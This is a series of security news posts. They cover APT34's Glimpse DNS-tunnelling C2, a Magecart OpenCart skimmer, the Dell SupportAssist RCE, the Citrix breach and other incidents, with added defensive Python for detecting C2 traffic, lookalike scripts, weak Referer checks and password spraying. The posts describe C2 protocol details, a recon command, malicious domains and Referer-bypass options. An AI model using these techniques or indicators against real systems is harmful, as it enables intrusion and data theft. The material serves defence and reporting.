Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19, 2019 researchers at Chronicle, a security company owned by Google's parent company Alphabet, examined the leaked tools, exfiltrated the previous week via a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset has also been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig has delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. “Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set,” Robert Falcone of Palo Alto Networks' Unit 42 research team wrote in an analysis of the group's activities.

Today I'd like to focus my attention on the Glimpse project since, in my personal opinion, it could be considered the “stereotype” of APT34 (with the data we've got so far).

The Glimpse Project

The package comes with a README file named “Read me.txt” (note the space). The name per se is quite unusual, and the content is a simple guide on how to set up a nodejs server and a Windows server that runs the “stand alone” .NET (>v4) application used to control infected machines. The infection starts by propagating a .VBS script called “runner_.vbs”, which is a simple runner for a more sophisticated PowerShell payload. The PowerShell payload is a quite complex script implementing several functions. The following image shows its “deobfuscated” main loop.

Glimpse Infection Payload Main Loop

The payload loops waiting for instructions; once a command comes from the C2 it performs the specific action and answers back to the C2 by requesting crafted subdomains based on the variable $aa_domain_bb. One of the most important functions the payload implements is dropping and executing additional toolsets. Indeed this payload is mainly a delivery module with some additional controls, entirely based on a DNS covert channel.

The $aa_domain_bb variable contains the main domain name for which the C2 acts as the authoritative Domain Name Server. While no actions are coming from the C2, the infected agent just periodically “pings” the C2 with basic information about the victim machine. For example, the function aa_ping_response_bb composes an encoded DNS message (aa_text_response_bb) which sends its own last IP address. At this stage we can appreciate two communication ways. The first communication channel comes from the subdomain generation, for example: 59071Md8200089EC36AC95T.www.example.com, while a second communication channel comes from the TXT DNS record, such as: control: 95 – ackNo: 0 – aid: 59071d8289 – action: M >>> 59071Md8200089EC36AC95T. Both of them are implemented to carry different information. One of the most important functions is aa_AdrGen_bb, which is the communication manager. It implements the control layer in order to send and receive control information such as commands, bytes received, whether the file transfer has been closed, and so on. The decoded actions are stored in the variable aa_act_bb and are the following:

Command and Control. Env creation for new connected agents
  • M. If the agent is already registered with the C2 this command acts like a ping: it updates basic information in the corresponding “agent” folder. If it is the first time the agent connects back to the C2, it starts a registration phase which enables, server side (command and control side), the building of a dedicated folder and file environment. Please check the previous image: Command and Control. Env creation for new connected agents.
  • W. This is a TXT request to list the waiting commands (or, if you wish, “kind of jobs”). The first command executed after the registration phase is the command tagged 10100, having as content: “whoami&ipconfig /all”.
  • D. Is actually what should be executed. It takes as input the tagged task and forwards to the requesting Agent the Base64-encoded content of the file.
  • 0. It is not a TXT request. This request makes the authoritative DNS (the command and control) answer the agent with the requested file in the waiting folder. If no “actions” (files) are in the waiting folder, the C2 answers back an A record having as data field a crafted IP (11.24.237.110); otherwise it answers back an A record having as data field “24.125.” + fileNameTmp.substring(0, 2) + “.” + fileNameTmp.substring(2, 5), with a time to live that is a random number between 0 and 360.
  • 1. It is not a TXT request. This request makes the authoritative DNS (the command and control) answer back with the file content. It implements a multiple-answer chain, according to RFC4408, to send files larger than 255 characters.
  • 2. It is not a TXT request. This request makes the authoritative DNS (the command and control) receive a file from the Agent. It implements a complex multi-part chain for reconstructing the partials coming from domain name requests. After sending all of the data, the Agent issues a final DNS query with “COCTabCOCT” in the data segment. This query notifies the C2 server that the Trojan has finished sending the contents of the file.
Command and Control: COCTabCOCT end of communication

The following image shows a running example of the infection chain on a controlled virtual environment. You can appreciate the communication layers over the requested domains. For example, the following request carries data in the subdomain, while the answered IP gives a specific affirmative/negative response.

10100*9056*****************.33333210100A[.]example[.]com

Glimpse running environment
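The query/answer pairs described above (encoded data in a long first label, the fixed “no file waiting” answer, the “24.125.” file-id answer prefix and the COCTabCOCT end-of-transfer marker) are exactly what a defender can look for in DNS logs. The following detector is an added example, not part of Marco Ramilli's analysis or of the leaked toolset: it runs three rules over constructed log lines modelled on the write-up (fields ts, client, query, qtype, answer; the domain is the example.com placeholder used above) and then counts hits per client. The entropy and length thresholds are assumed starting values, not measured ones.

```python
import math
from collections import defaultdict

# Constructed DNS log sample (fields: ts client query qtype answer), modelled on
# the queries and answers described in the write-up. Not real capture data.
SAMPLE_DNS_LOG = """\
1556790001.001 10.0.0.5 59071Md8200089EC36AC95T.www.example.com A 11.24.237.110
1556790002.002 10.0.0.5 10100*9056*****************.33333210100A.example.com A 24.125.10.100
1556790003.003 10.0.0.5 COCTabCOCT.59071d8289.example.com A 11.24.237.110
1556790004.004 10.0.0.7 www.example.com A 93.184.216.34
1556790005.005 10.0.0.7 mail.example.com A 93.184.216.35
"""

# Indicators taken from the analysis above.
IDLE_ANSWER = "11.24.237.110"       # A record returned when no file is waiting
FILE_ANSWER_PREFIX = "24.125."      # A record encoding the waiting file name
END_MARKER = "COCTabCOCT"           # final query after an upload completes

# Generic "encoded data in a label" heuristic; thresholds are assumed values.
MIN_LABEL_LEN = 20
MIN_ENTROPY = 3.0


def shannon_entropy(s: str) -> float:
    """Bits per character of s; encoded or random content scores high."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify_query(query: str, answer: str) -> list:
    """Reasons a single query/answer pair resembles the Glimpse channel (empty if none)."""
    reasons = []
    first_label = query.rstrip(".").split(".")[0]
    if END_MARKER in query:
        reasons.append("end-of-transfer-marker")
    if len(first_label) >= MIN_LABEL_LEN and shannon_entropy(first_label) >= MIN_ENTROPY:
        reasons.append("long-high-entropy-label")
    if answer == IDLE_ANSWER:
        reasons.append("c2-idle-answer")
    elif answer.startswith(FILE_ANSWER_PREFIX):
        # 24.125.0.0/16 is a legitimately routed range, so on its own this is a
        # weak signal; it should be correlated with other hits from the client.
        reasons.append("c2-file-answer")
    return reasons


def analyze(log_text: str) -> list:
    """Return one finding dict per flagged log line, in log order."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, client, query, _qtype, answer = parts
        reasons = classify_query(query, answer)
        if reasons:
            findings.append({"ts": ts, "client": client, "query": query, "reasons": reasons})
    return findings


def suspicious_clients(findings: list, min_hits: int = 2) -> dict:
    """Clients with at least min_hits flagged queries, mapped to their hit count."""
    per_client = defaultdict(int)
    for finding in findings:
        per_client[finding["client"]] += 1
    return {client: n for client, n in per_client.items() if n >= min_hits}


if __name__ == "__main__":
    hits = analyze(SAMPLE_DNS_LOG)
    for h in hits:
        print(h["client"], h["query"], h["reasons"])
    print(suspicious_clients(hits))
```

The second sample line is instructive: its label is long but made mostly of one repeated character, so the entropy rule stays quiet and only the answer rule fires, which is why the per-client aggregation rather than any single rule should drive an alert.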

The command and control is implemented by a standalone .NET application working through files. The backend, a nodeJS server, runs and offers a public API, and saves requests to agents and results from agents directly into files named with a “UID-IP” convention acting as agent ID. The panel reads those files and implements stats and actions. The following image shows the static configuration section in the C2 panel.

Command and Control Panel Hardcoded Settings

The Control Panel is mainly composed of two .NET Window components: the Main Window, where the list of connected Agents is shown together with additional information such as Agent ID, Agent IP, Agent Last Online Time and Attacker Comments, and the Control Window, which is opened once the attacker clicks on a selected Agent. The onClick event spawns the following code:

controlPanel = new controlPanel(agent.id, agent.ip, agent.lastActivity);
controlPanel.Show();

After its initialisation phase the control panel enables the attacker to write or upload a list of commands, or a file containing commands, for the agents. The following image shows the controlPanel function which takes commands from the input “TextFields” and creates a new file containing the commands in the waiting folder. The contents of that folder will be dropped on the selected Agent and executed.

Command and Control, controlPanel insert_command function

The controlPanel offers many additional functionalities to better control single Agents or groups of Agents. Trying to date the project, we can observe the compile time, which happens to be 9/1/2018 at 5:13:02 AM for newPanel-dbg.exe, while it is 9/8/2018 at 8:01:54 PM for the imported library called ToggleSwitch.dll.

With high probability we are facing a multi-modular attacking framework where, on one side, the DNS communication channel delivers commands to the target Agents and, on the other side, many control panels could be developed and attached to the DNS communication system. It would be quite obvious if you look at the framework as a developer: since the DNS communication channel uses files to store information and to synchronise actions and agents, many C2s could be adapted to use it as a communication channel. We might think that many APT34 units would be able to reuse such a communication channel.

Another interesting observation might come from trying to date the framework. A PowerShell Agent was leaked on PasteBin in August 2018 (take a look here) by an anonymous user and has been seen, as of today, by very few people (197 so far). The command and control used has been compiled the month before (July 2018). The development technologies (.NET, nodeJS) are very different and the implementation styles differ as well. The DNS communication channel is developed in a linear and more function-driven programming style, while the standalone command and control is developed using a slightly more sophisticated object-oriented programming style with a flavour of agent-oriented programming: the attacker considers the agent object as an independent agent working without direct control. The attacker writes files as the medium to address the Agent behaviour.

The original post was published on the Marco Ramilli’s blog:

https://marcoramilli.com/2019/05/02/apt34-glimpse-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I've also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I've ever experienced! Now I technically lead Yoroi defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, Glimpse project)

The post APT34: Glimpse project appeared first on Security Affairs.

Magecart Group 12 also targets Opencart-based online stores

Magecart made the headlines again: Magecart Group 12 is conducting a large-scale operation that targets OpenCart online stores.

According to security experts at RiskIQ, the Magecart Group 12 is behind a large-scale operation against OpenCart online stores. The attackers used stealth tactics to remain under the radar and siphon payment data from compromised e-commerce sites.

Security firms have monitored the activities of a dozen Magecart groups since at least 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

OpenCart is one of the most popular e-commerce platforms worldwide and is currently used by thousands of online stores of any size. Since OpenCart is one of the top three e-commerce CMSs, after Shopify and Magento, it is normal that crooks attempt to target it too.

Previous attacks carried out by Magecart Group 12 hit e-commerce services used by thousands of online stores running Magento, OpenCart, and OSCommerce. The attacks against OpenCart-based stores are similar to the Magento ones.

“We’ll also break down a large-scale Magecart Group 12 campaign uncovered by RiskIQ researchers abusing the OpenCart platform, which is run by thousands of e-commerce sites.” reads the analysis published by RiskIQ. “Group 12 breached OpenCart sites to inject their skimmer similar to the Magento attacks, starting with the insertion of a very well-picked domain name: batbing[.]com.”

In the latest wave of attacks, Magecart Group 12 injected its skimmer into OpenCart websites only after checking whether the visitor had accessed a checkout page. Technically, they added the following pre-filter JavaScript code:

Magecart Group 12 OpenCart

Attackers used a domain name that attempts to impersonate the Bing.com search engine script.

“One other notable element of this attack is the impersonation attempt for the Bing.com search engine script:”

https://batbing[.]com/js/bat.min.js

The normal Bing URL looks very similar:

https://bat[.]bing[.]com/bat.js
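A lookalike host such as batbing[.]com is exactly the kind of thing an allowlist audit of a checkout page catches. The following is an added example, not RiskIQ's or OpenCart's code: it pulls every script src out of a page, resolves relative URLs against the shop's own origin, accepts only hosts on an allowlist (exact match or true subdomain) and labels the rest as “lookalike” when they contain the brand label of a trusted host. The shop hostname, the allowlist and the HTML fragment are constructed; the batbing URL is the one quoted in the article.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed allowlist: the shop's own host plus the one third-party script it expects.
TRUSTED_HOSTS = ["www.example-shop.com", "bat.bing.com"]
SHOP_BASE_URL = "https://www.example-shop.com/index.php?route=checkout/checkout"

# Constructed checkout fragment; the batbing.com URL is the one quoted in the article.
SAMPLE_CHECKOUT_HTML = """
<script src="/js/common.js"></script>
<script type="text/javascript" src="https://bat.bing.com/bat.js"></script>
<script src="https://batbing.com/js/bat.min.js"></script>
<script src='https://cdn.unrelated-example.net/lib.js'></script>
"""

SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def extract_script_srcs(html: str) -> list:
    """All external script URLs in document order (inline scripts have no src)."""
    return SCRIPT_SRC_RE.findall(html)


def brand_tokens(hosts: list) -> set:
    """Registrable label of each trusted host, e.g. 'bing' from bat.bing.com."""
    return {h.split(".")[-2] for h in hosts if h.count(".") >= 1}


def is_trusted(host: str, trusted: list) -> bool:
    """Exact host or a real subdomain; 'batbing.com' is neither for 'bat.bing.com'."""
    return any(host == t or host.endswith("." + t) for t in trusted)


def audit_scripts(html: str, base_url: str = SHOP_BASE_URL, trusted: list = TRUSTED_HOSTS) -> list:
    """One finding per script host not on the allowlist, flagged as lookalike or unknown."""
    tokens = brand_tokens(trusted)
    findings = []
    for src in extract_script_srcs(html):
        host = (urlsplit(urljoin(base_url, src)).hostname or "").lower()
        if is_trusted(host, trusted):
            continue
        mimics = sorted(t for t in tokens if t in host)
        findings.append({
            "src": src,
            "host": host,
            "verdict": "lookalike" if mimics else "unknown",
            "mimics": mimics,
        })
    return findings


if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_CHECKOUT_HTML):
        print(f["verdict"], f["host"], f["src"])
```

A Content-Security-Policy script-src directive built from the same allowlist enforces this in the browser, but the offline audit is what tells you the injected tag exists in the first place; the same pre-filtering the article describes means the skimmer may only appear on checkout pages, so fetch those specifically.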

RiskIQ, with the support of AbuseCH and the Shadowserver Foundation, took the domain used by the hackers offline.

Experts found references to the skimmer script in a forum post on the OpenCart forum.

RiskIQ experts believe that new types of web skimming attacks will be observed in the future; hackers will go beyond payment data, attempting to steal login credentials and other sensitive information.

“It’s likely that new breeds of these web skimming attacks will emerge in the future, whether by new or existing Magecart groups. They’re currently focusing on payment data, but we’re already seeing moves to skim login credentials and other sensitive information.” concludes RiskIQ. “This widens the scope of potential Magecart victims far beyond e-commerce alone.”

Pierluigi Paganini

(SecurityAffairs – Magecart Group 12, OpenCart)

The post Magecart Group 12 also targets Opencart-based online stores appeared first on Security Affairs.

A ‘Cyber Event’ disrupted power grid operations in three US states

The Department of Energy confirmed that in March a cyber event disrupted power grid operations in California, Wyoming, and Utah.

The Department of Energy confirmed that in March 2019, between 9 a.m. and 7 p.m., a cyber event disrupted energy grid operations in California, Wyoming, and Utah.

The news was first reported by E&E News: a “cyber event” interrupted grid operations in parts of the western United States in March, according to a report posted by the Department of Energy.

The report states that interruptions of electrical system operations were observed in California (Kern County, Los Angeles County), Utah (Salt Lake County) and Wyoming (Converse County). The report doesn't include the name of the utility company that suffered the incident. It must be clear that a report of a cyber incident doesn't necessarily imply that the company has been hacked; in some cases human errors or system misconfigurations can be the root cause of a cyber incident.

power grid incident

U.S. utilities are required to notify the DOE within one hour of a cyber attack against their systems. The DOE can fine power companies that fail to file an OE-417 electric disturbance report up to $2,500 per day.

Media outlets like E&E News and Motherboard correctly described the report as cryptic; the Department of Energy has not responded to a request by Motherboard for more information about the cyber event.

“A “cyber event,” according to infrastructure hacking experts, could be anything from hackers messing with the grid remotely, to a much less dramatic hardware or software bug.” reported MotherBoard.

Anyway, if it were confirmed that hackers remotely interfered with power grid networks in the US, the event would be unprecedented for the country. The only power grid hacks recognized by the cyber security community are the ones that caused massive power outages in Ukraine in 2015 and in 2016.

E&E News cited, for instance, the incident that occurred in January 2018 at the Michigan utility Consumers Energy, which filed the same type of DOE notice when an employee in training accidentally caused a blackout for about 15,000 people (Energywire, March 8, 2018).

“There was no malicious intent” in that case, a spokeswoman said at the time, and Consumers Energy brought the lights back on within a few hours.

Cyber attacks against critical infrastructures, including power grids, are dangerous threats and their possible consequences are unpredictable; for this reason, it is essential to share knowledge about attacks and attackers' TTPs.

Pierluigi Paganini

(SecurityAffairs – power grid, hacking)

The post A ‘Cyber Event’ disrupted power grid operations in three US states appeared first on Security Affairs.

How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist

A flaw in Dell SupportAssist, a pre-installed tool on most Dell computers, could be exploited by hackers to compromise them remotely.

The security researcher Bill Demirkapi (17) has discovered a critical remote code execution vulnerability in the Dell SupportAssist utility that is pre-installed on most Dell computers.

The vulnerability could be exploited by hackers to compromise systems remotely.

Dell SupportAssist is described as a tool that proactively checks the health of a system's hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting.

To solve the problems, Dell SupportAssist interacts with the Dell Support website and automatically detects the Service Tag or Express Service Code of the Dell product.

The utility performs hardware diagnostic tests and analyzes the hardware configuration of the system, including installed device drivers, and is able to install missing or available driver updates.

Dell SupportAssist tool

The software leverages a local web service that is protected using the “Access-Control-Allow-Origin” response header and by implementing restrictions to accept commands only from the “dell.com” website or its subdomains.

“On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest. ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks” reads the analysis published by Bill Demirkapi.

“An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell.”

Demirkapi discovered that it is possible to bypass the protections implemented by Dell and to download and execute malicious code from a remote server under the control of the attackers.

“To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.”
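The four options above fall into two groups: the first three exist because the check is on a header the browser sends, and the fourth works even when the header is parsed perfectly. The following added example (mine, not Demirkapi's or Dell's code, and not a reconstruction of what SupportAssist actually does) contrasts a deliberately weak substring test with a strict parse-and-match of the Referer, over constructed header values. The strict version closes the sloppy bypasses but still accepts any name under the trusted domain, which is the point of option 4: a privileged local service cannot use Referer or Origin as authentication and needs a secret that only its legitimate caller holds.

```python
from urllib.parse import urlsplit

TRUSTED_DOMAIN = "dell.com"  # the domain the service is meant to trust, per the write-up


def naive_referer_ok(referer) -> bool:
    """Weak pattern constructed for contrast: accept if 'dell.com' appears anywhere."""
    return TRUSTED_DOMAIN in (referer or "")


def strict_referer_ok(referer) -> bool:
    """Parse the header; require https and an exact host or a true subdomain."""
    if not referer:
        return False
    parts = urlsplit(referer)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()   # hostname drops any user:pass@ prefix
    return host == TRUSTED_DOMAIN or host.endswith("." + TRUSTED_DOMAIN)


# Constructed Referer values; attacker-side names use reserved example domains.
CASES = {
    "legit": "https://www.dell.com/support",
    "suffix_in_other_domain": "https://dell.com.attacker.example/",
    "substring_in_other_domain": "https://notdell.com/",
    "userinfo_trick": "https://www.dell.com@attacker.example/",
    "plain_http": "http://www.dell.com/",
    # Option 2/4 above: the name is genuinely under dell.com but resolves to the
    # attacker; no header check can tell this apart from a legitimate page.
    "hijacked_subdomain": "https://random-label.dell.com/",
    "missing": None,
}


def evaluate(check) -> dict:
    """Apply one check function to every case; returns {case_name: accepted?}."""
    return {name: check(ref) for name, ref in CASES.items()}


if __name__ == "__main__":
    naive, strict = evaluate(naive_referer_ok), evaluate(strict_referer_ok)
    for name in CASES:
        print(f"{name:28} naive={naive[name]!s:5} strict={strict[name]!s:5}")
```

Checking that the request came from the local machine, which the quoted analysis says the service also does, suffers from the same limit: it constrains who can reach the listener, not which web page made the browser send the request.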

Dell acknowledged the flaw as explained in a security advisory and released a security update to address it:

“An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites,” reads the advisory.

The remote code execution flaw, tracked as CVE-2019-3719, affects Dell SupportAssist Client versions prior to version 3.2.0.90.

The expert published a video PoC of the hack and the source code of the proof of concept:

Pierluigi Paganini

(SecurityAffairs – Dell SupportAssist, hacking)

The post How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist appeared first on Security Affairs.

Tenable experts found 15 flaws in wireless presentation systems

Experts at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, including flaws that can be exploited to remotely hack devices.

Wireless presentation systems are used to display content on a screen from several kinds of devices, including mobile devices and laptops. These systems are widely used in enterprises and educational organizations.

Researchers at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, some of which can be exploited for command injection and for gaining access to a device.

“Tenable found multiple vulnerabilities while investigating a Crestron AM-100. Tenable also discovered that the Crestron AM-100 shared a code base with the Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and possibly others.” reads the analysis published by Tenable. “The vulnerabilities listed below do not affect all devices”

The experts focused their tests on the Crestron AirMedia AM-100 and AM-101 products, but systems from other vendors could be affected because these devices reuse portions of code. The experts discovered that some of the issues also impact Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and potentially other vendors.

wireless presentation systems

Several flaws could be exploited by a remote, unauthenticated attacker to inject operating system commands. Other issues can be exploited by a remote, unauthenticated attacker to change admin and moderator passwords and to view presentations.

The issues, including a hardcoded session ID, allow an unauthenticated, remote attacker to stop, start, and disconnect any screen sharing session, due to insufficient authentication checks in the moderator controls.

Experts also found a denial-of-service (DoS) flaw and credentials stored in plain text that could be accessible to authenticated users.

Searching for Crestron AirMedia devices exposed online with Shodan, we can find hundreds of devices, most of them located in the US, followed by Canada and Finland.

Tenable started reporting the vulnerabilities to vendors in January, but at the time of public disclosure only Extron and Barco had released firmware updates.

Until fixes are available, users should configure their environments so that these systems are not exposed to the internet.

Pierluigi Paganini

(SecurityAffairs – wireless presentation systems, hacking)


Citrix confirmed hackers had access to its network for five months

Citrix confirmed that the hackers who breached its network stole sensitive personal information of both former and current employees for about six months.

In March, the American multinational software company Citrix disclosed a security breach; according to the firm, an international cybercriminal gang gained access to its internal network. Experts at cybersecurity firm Resecurity attributed the attack to Iranian threat actors.

Hackers were able to steal business documents, but the company’s products and services were not impacted by the attack.

Citrix learned of the intrusion when the FBI notified it on March 6, 2019; the company announced that it had secured its network and hired a forensic firm to assist with the investigation of the incident.

The software giant has now provided more details about the data breach and confirmed that hackers had access to its network for roughly five months.

This week Citrix submitted a notice of data breach to the California Office of the Attorney General explaining that attackers had intermittent access to its network between October 13, 2018, and March 8, 2019.

The attackers exfiltrated files from company systems, some of which contained information on current and former employees. Exposed data includes names, social security numbers, and financial information.

“We currently believe that the cyber criminals had intermittent access to our network between October 13, 2018 and March 8, 2019 and that they removed files from our systems, which may have included files containing information about our current and former employees and, in limited cases, information about beneficiaries and/or dependents.” reads the notice of data breach sent by Citrix.


At the time of writing it is still unclear how many people have been impacted by the data breach.

California Civil Code section 1798.82(a) requires companies to report data breaches to the state’s Attorney General if more than 500 California residents are impacted. This implies that, even though Citrix did not give the total number of affected employees in the notice, at least 500 state residents are affected.

The company is notifying all potentially impacted individuals and providing them with free credit monitoring and fraud protection services.

“Additionally, and as a precaution, we have arranged for you, at your option, to enroll in Equifax ID Patrol, a complimentary one-year credit monitoring, dark web monitoring, and identity restoration service.” continues the notice.

In early April, Citrix revealed that the hackers likely breached its network via password spraying, meaning that they tried a handful of commonly used passwords against many accounts rather than many passwords against one account.

“We identified password spraying, a technique that exploits weak passwords, as the likely method by which the threat actors entered our network.” reads a blog post published by Citrix.
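Password spraying leaves a recognisable shape in authentication logs: one source, many distinct usernames, only one or two failures per username, so per-account lockout never trips. The following added example (not Citrix’s code, nor anything from its notice) shows one way a defender can tell that shape apart from ordinary brute force and from a user mistyping a password; the log format, source addresses and thresholds are constructed for the example.

```python
"""Detect password spraying in authentication logs (added example).

Spraying tries a few common passwords against MANY accounts, so each account
sees only one or two failures and per-account lockout never trips. The shape
in the logs is the inverse of brute force: one source, many distinct users,
few failures per user, inside a short window. A success from the same source
right after such a run is the event to chase first.
"""
from __future__ import annotations

import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (assumed "<ts> <FAIL|OK> user=<name> src=<ip>" format):
#  - 203.0.113.7 walks through seven accounts, then logs in as one of them,
#  - 192.0.2.5 is a real user who mistyped a password twice,
#  - 198.51.100.9 (appended below) hammers the single account "admin".
SAMPLE_LOG = """\
2019-02-14T03:00:01Z FAIL user=alice src=203.0.113.7
2019-02-14T03:00:03Z FAIL user=bob src=203.0.113.7
2019-02-14T03:00:05Z FAIL user=carol src=203.0.113.7
2019-02-14T03:00:07Z FAIL user=dave src=203.0.113.7
2019-02-14T03:00:09Z FAIL user=erin src=203.0.113.7
2019-02-14T03:00:11Z FAIL user=frank src=203.0.113.7
2019-02-14T03:00:13Z FAIL user=grace src=203.0.113.7
2019-02-14T03:00:15Z FAIL user=alice src=203.0.113.7
2019-02-14T03:00:17Z FAIL user=bob src=203.0.113.7
2019-02-14T03:00:19Z OK user=erin src=203.0.113.7
2019-02-14T04:10:00Z FAIL user=alice src=192.0.2.5
2019-02-14T04:10:20Z FAIL user=alice src=192.0.2.5
2019-02-14T04:10:45Z OK user=alice src=192.0.2.5
"""
# Twelve rapid failures against one account: the brute-force control case.
SAMPLE_LOG += "".join(
    f"2019-02-14T03:05:{s:02d}Z FAIL user=admin src=198.51.100.9\n" for s in range(12)
)

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) (?P<result>FAIL|OK) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_log(text: str) -> list[tuple[datetime, str, str, str]]:
    """Turn log text into (timestamp, result, user, src) tuples; skip unparseable lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events


def classify_sources(
    events,
    window: timedelta = timedelta(minutes=10),
    spray_min_accounts: int = 5,
    spray_max_per_account: int = 3,
    brute_min_failures: int = 8,
) -> dict[str, str]:
    """Label every source IP as spray, spray_with_success, brute_force or normal.

    Thresholds are assumptions for the example; tune them to your own baseline.
    Spray: inside one `window`, failures on >= spray_min_accounts distinct users,
    none of them failing more than spray_max_per_account times (stays under a
    typical lockout). Brute force: >= brute_min_failures on a single user.
    """
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[3]].append(ev)

    labels = {}
    for src, evs in by_src.items():
        evs.sort()
        fails = [(t, u) for t, r, u, _ in evs if r == "FAIL"]
        label = "normal"
        # Slide a window starting at each failure and look at the user mix inside it.
        for i, (start, _) in enumerate(fails):
            per_user = Counter(u for t, u in fails[i:] if t - start <= window)
            if (len(per_user) >= spray_min_accounts
                    and max(per_user.values()) <= spray_max_per_account):
                label = "spray"
                break
            if len(per_user) == 1 and max(per_user.values()) >= brute_min_failures:
                label = "brute_force"
                break
        # A successful login from a spraying source means a password actually hit.
        if label == "spray" and any(r == "OK" for _, r, _, _ in evs):
            label = "spray_with_success"
        labels[src] = label
    return labels


if __name__ == "__main__":
    for src, label in sorted(classify_sources(parse_log(SAMPLE_LOG)).items()):
        print(f"{src:<15} {label}")
```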

Pierluigi Paganini

(SecurityAffairs – Citrix, data breach)


Victims of ZQ Ransomware can decrypt their files for free

Good news for the victims of the ZQ Ransomware: security experts at Emsisoft have released a free decryptor tool.

Good news for the victims of the ZQ Ransomware: security experts at Emsisoft have released a free decryptor tool that allows them to recover their files at no cost.

ZQ Ransomware infected users in the US, India, Poland, Brazil and the UK.

The ZQ Ransomware encrypts victims’ files using the Salsa20 and RSA-1024 algorithms. The malware appends the extension “.[w_decrypt24@qq.com].zq” to the encrypted files.

The ransomware drops a ransom note, “{HELP__DECRYPT}.txt”, on the victims’ machines; it includes payment instructions. Victims can contact the operators behind the ransomware by sending a message to the email address “w_decrypt24@qq.com”.

Below is the text of the ransom note:

“All of _our files are encr_pted* to decr_pt them write me to email::w_decrypt24@qq.com
Your key:
[redacted]”


In order to decrypt the files, victims need to provide the tool with an encrypted file together with its original, unencrypted version. The decryptor tool is available at the following link:

https://www.emsisoft.com/decrypter/zq

Below is the step-by-step procedure:

  1. IMPORTANT! Make sure you remove the malware from your system first, otherwise it will repeatedly lock your system or encrypt files.
  2. Download the free Emsisoft Decrypter for ZQ.
  3. Run the executable and confirm the license agreement when asked.
  4. Click “Start” to decrypt your files. Note that this may take a while.
  5. All done! Gotta crypt ’em all!

Emsisoft has recently released several tools to help victims of other ransomware families, including the CryptoPokemon ransomware, the Planetary Ransomware, the Hacked Ransomware, and the PewDiePie ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor)


MIVD Dutch intelligence warns of Russian, Chinese cyber espionage

The Military Intelligence and Security Service (MIVD) warns of “worrying” cyber espionage activities carried out by Russia and China.

